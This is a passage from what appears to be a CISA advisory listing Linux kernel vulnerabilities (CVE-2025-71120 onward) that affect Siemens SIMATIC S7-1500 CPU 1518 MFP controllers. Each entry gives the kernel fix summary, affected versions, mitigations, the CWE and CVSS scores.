<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71120</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf A zero length gss_token results in pages == 0 and in_token-&gt;pages[0] is NULL. The code unconditionally evaluates page_address(in_token-&gt;pages[0]) for the initial memcpy, which can dereference NULL even when the copy length is 0. Guard the first memcpy so it only runs when length &gt; 0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71120">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71123</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: fix string copying in parse_apply_sb_mount_options() strscpy_pad() can't be used to copy a non-NUL-term string into a NUL-term string of possibly bigger size. Commit 0efc5990bca5 ("string.h: Introduce memtostr() and memtostr_pad()") provides additional information in that regard. So if this happens, the following warning is observed: strnlen: detected buffer overflow: 65 byte read of buffer size 64 WARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032 Modules linked in: CPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032 Call Trace: __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039 strnlen include/linux/fortify-string.h:235 [inline] sized_strscpy include/linux/fortify-string.h:309 [inline] parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline] __ext4_fill_super fs/ext4/super.c:5261 [inline] ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706 get_tree_bdev_flags+0x387/0x620 fs/super.c:1636 vfs_get_tree+0x93/0x380 fs/super.c:1814 do_new_mount fs/namespace.c:3553 [inline] path_mount+0x6ae/0x1f70 fs/namespace.c:3880 do_mount fs/namespace.c:3893 [inline] __do_sys_mount fs/namespace.c:4103 [inline] __se_sys_mount fs/namespace.c:4080 [inline] __x64_sys_mount+0x280/0x300 fs/namespace.c:4080 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x76/0x7e Since userspace is expected to provide s_mount_opts field to be at most 63 characters long with the ending byte being NUL-term, use a 64-byte buffer which matches the size of s_mount_opts, so that strscpy_pad() does its job properly. Return with error if the user still managed to provide a non-NUL-term string here. Found by Linux Verification Center (linuxtesting.org) with Syzkaller.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71123">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71131</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: seqiv - Do not use req-&gt;iv after crypto_aead_encrypt As soon as crypto_aead_encrypt is called, the underlying request may be freed by an asynchronous completion. Thus dereferencing req-&gt;iv after it returns is invalid. Instead of checking req-&gt;iv against info, create a new variable unaligned_info and use it for that purpose instead.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71131">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71161</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dm-verity: disable recursive forward error correction There are two problems with the recursive correction: 1. It may cause denial-of-service. In fec_read_bufs, there is a loop that has 253 iterations. For each iteration, we may call verity_hash_for_block recursively. There is a limit of 4 nested recursions - that means that there may be at most 253^4 (4 billion) iterations. Red Hat QE team actually created an image that pushes dm-verity to this limit - and this image just makes the udev-worker process get stuck in the 'D' state. 2. It doesn't work. In fec_read_bufs we store data into the variable "fio-&gt;bufs", but fio bufs is shared between recursive invocations, if "verity_hash_for_block" invoked correction recursively, it would overwrite partially filled fio-&gt;bufs.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71161">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71162</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: tegra-adma: Fix use-after-free A use-after-free bug exists in the Tegra ADMA driver when audio streams are terminated, particularly during XRUN conditions. The issue occurs when the DMA buffer is freed by tegra_adma_terminate_all() before the vchan completion tasklet finishes accessing it. The race condition follows this sequence: 1. DMA transfer completes, triggering an interrupt that schedules the completion tasklet (tasklet has not executed yet) 2. Audio playback stops, calling tegra_adma_terminate_all() which frees the DMA buffer memory via kfree() 3. The scheduled tasklet finally executes, calling vchan_complete() which attempts to access the already-freed memory Since tasklets can execute at any time after being scheduled, there is no guarantee that the buffer will remain valid when vchan_complete() runs. Fix this by properly synchronizing the virtual channel completion: - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the descriptors as terminated instead of freeing the descriptor. - Add the callback tegra_adma_synchronize() that calls vchan_synchronize() which kills any pending tasklets and frees any terminated descriptors. Crash logs: [ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0 [ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0 [ 337.427562] Call trace: [ 337.427564] dump_backtrace+0x0/0x320 [ 337.427571] show_stack+0x20/0x30 [ 337.427575] dump_stack_lvl+0x68/0x84 [ 337.427584] print_address_description.constprop.0+0x74/0x2b8 [ 337.427590] kasan_report+0x1f4/0x210 [ 337.427598] __asan_load8+0xa0/0xd0 [ 337.427603] vchan_complete+0x124/0x3b0 [ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0 [ 337.427617] tasklet_action+0x30/0x40 [ 337.427623] __do_softirq+0x1a0/0x5c4 [ 337.427628] irq_exit+0x110/0x140 [ 337.427633] handle_domain_irq+0xa4/0xe0 [ 337.427640] gic_handle_irq+0x64/0x160 [ 337.427644] call_on_irq_stack+0x20/0x4c [ 337.427649] do_interrupt_handler+0x7c/0x90 [ 337.427654] el1_interrupt+0x30/0x80 [ 337.427659] el1h_64_irq_handler+0x18/0x30 [ 337.427663] el1h_64_irq+0x7c/0x80 [ 337.427667] cpuidle_enter_state+0xe4/0x540 [ 337.427674] cpuidle_enter+0x54/0x80 [ 337.427679] do_idle+0x2e0/0x380 [ 337.427685] cpu_startup_entry+0x2c/0x70 [ 337.427690] rest_init+0x114/0x130 [ 337.427695] arch_call_rest_init+0x18/0x24 [ 337.427702] start_kernel+0x380/0x3b4 [ 337.427706] __primary_switched+0xc0/0xc8</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71162">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71163</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: fix device leaks on compat bind and unbind Make sure to drop the reference taken when looking up the idxd device as part of the compat bind and unbind sysfs interface.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71163">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71185</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation Make sure to drop the reference taken when looking up the crossbar platform device during am335x route allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71185">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71186</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: stm32: dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71186">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71189</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw: dmamux: fix OF node leak on route allocation failure Make sure to drop the reference taken to the DMA master OF node also on late route allocation failures.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71189">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71190</a></h3>
<div class="csaf-accordion-content">
